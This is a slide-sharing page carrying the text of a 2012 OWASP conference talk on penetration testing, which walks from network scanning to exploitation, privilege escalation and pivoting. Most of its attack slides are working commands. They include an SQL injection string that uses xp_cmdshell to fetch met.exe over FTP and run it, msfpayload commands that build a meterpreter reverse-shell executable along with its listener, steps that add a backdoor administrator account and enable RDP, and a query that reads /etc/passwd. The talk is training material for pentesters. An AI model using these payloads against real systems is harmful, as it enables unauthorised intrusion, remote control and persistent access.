Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 

Recently uploaded (20)

The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 

Public exploit held private : Penetration Testing the researcher’s way

  • 1. OWASP InfoSec India Conference 2012 August 24th – 25th, 2012 The OWASP Foundation Hotel Crowne Plaza, Gurgaon http://www.owasp.org http://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 2. DISCLAIMER! This presentation contains materials on the evolution of a pen tester which is solely based on the perspective of the speaker which might contradict with opinions of individuals. All the scenarios explained here are fictional even though they might resemble to realistic situations. Even though no harm intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
  • 3. Setting the context Why Pentesting? How do you do it?  To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
  • 4. Setting the context  Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
  • 5. Basics Pentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
  • 6. Basics… Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
  • 7. Scanning Why?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
  • 8. Scanning Desi Jugaad  Ping sweep / shell scripts  Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
  • 9. Desi Jugaad (Local Hack) Ping Sweep Windows FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
  • 10. Scanning Problem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
  • 11. Desi Jugaad  Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap  Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 12. Nmap Scripts /usr/locale/share/nmap/scripts OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 12
  • 13. Nmap Scripts • Shared files and folders • nmap --script=smb-enum-shares 192.168.80.129 • Check for SMB vulnerabilities • nmap --script=smb-check-vulns 192.168.80.129 • Scan for machines that use default Ms sql username,password • nmap --script=ms-sql-info 192.168.80.129 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
  • 14. Scanning I have Nessus. Why to go through so much pain? I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
  • 15. Exploit  Motive  To gain access  Data  Command execution  Destroy everything!  Categories  Service level  OS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
  • 16. Exploit What to exploit?  FTP?  HTTP?  SNMP?  What else? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
  • 17. Exploit  FTP  Server Exploit – Buffer Overflow  Fuzzing???  Bruteforce SNMP  What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
  • 18. FTP Tips Windows echo open 192.168.12.124 > ftp.txt echo ftp>> ftp.txt echo ftp>> ftp.txt echo bin >> ftp.txt echo get met2.exe >> ftp.txt echo bye >> ftp.txt ftp -s:ftp.txt OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
  • 19. FTP Tips Linux echo quote user ftp>> ftp.txt quote user ftp echo quote pass ftp>>ftp.txt echo verbose>>ftp.txt echo binary >> ftp.txt echo get exploit.c >> ftp.txt echo bye >> ftp.txt cat ftp.txt|ftp -n 192.168.12.124 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
  • 20. Exploit  HTTP  Server Exploit  Command Execution  Web Shells  SQLi OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
  • 21. HTTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 21
  • 22. SQLi Tips ' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye';exec master..xp_cmdshell 'ftp - s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';-- OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
  • 23. SQLi Tips My SQL non-interactive  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "use mysql; show tables;"  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';" OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
  • 24. Exploit  Metasploit  Use Exploit  Set payload  exploit  Any other options? How about writing own exploit (at free time) (out of scope) OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
  • 25. L33t love story  Exploit’s love letter to the machine  PAYLOAD… Which courier?  MSF – set payload  Custom program – msfpayload  Bad characters  Executable - msfpayload OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
  • 26. Payload Generator  meterpreter msfpayload options: ./msfpayload windows/meterpreter/reverse_tcp O Create exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe Generate shellcode: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
  • 27. From msf: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.40 set LPORT 80 show options exploit OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
  • 28. Exploit I am in, what to do?  Secure access?  Add user  Open a port  I like it the reverse way  meterpreter  Dude, did you get root/admin acces? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
  • 29. Add User  Windows Shell net user hacker hacker123 /add net localgroup administrators hacker /add  Meterpreter use incognito add_user hacker hacker123 add_localgroup_user Administrators hacker  RDP enable reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
  • 30. Privilege Escalation  Categories  Service level  OS Problem!  How can I transfer my exploit there?  Netcat  FTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
  • 31. Kernel Exploits  Linux Kernel <= 2.6.36-rc8 http://www.exploit- db.com/exploits/15285/  Linux Kernel 2.4/2.6 http://www.exploit- db.com/exploits/9545/  Linux Kernel 2.6 http://www.exploit- db.com/exploits/8478/  Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
  • 32. Windows Exploits  Windows Vista, 7, 2008 http://www.exploit- db.com/exploits/15609/  Windows XP, 2003 http://www.exploit- db.com/exploits/18176/  Linux + NT priv esc http://www.exploit- db.com/exploits/9301/  Windows XP SP2, SP3 http://www.exploit- db.com/exploits/9301/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
  • 33. Pivoting…  Huh? Why do I need it? How do I do it?  nc + port forwarding  Ssh tunneling OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
  • 34. Fuzzing…  My favorite but last thing I prefer to do on my own  Python rocks!  Basic  Advanced  SEH handler  Egg hunting shellcode OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
  • 35. Did I miss anything?  Questions  Perspectives  Comments tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
  • 36. Thank you tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu 36 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)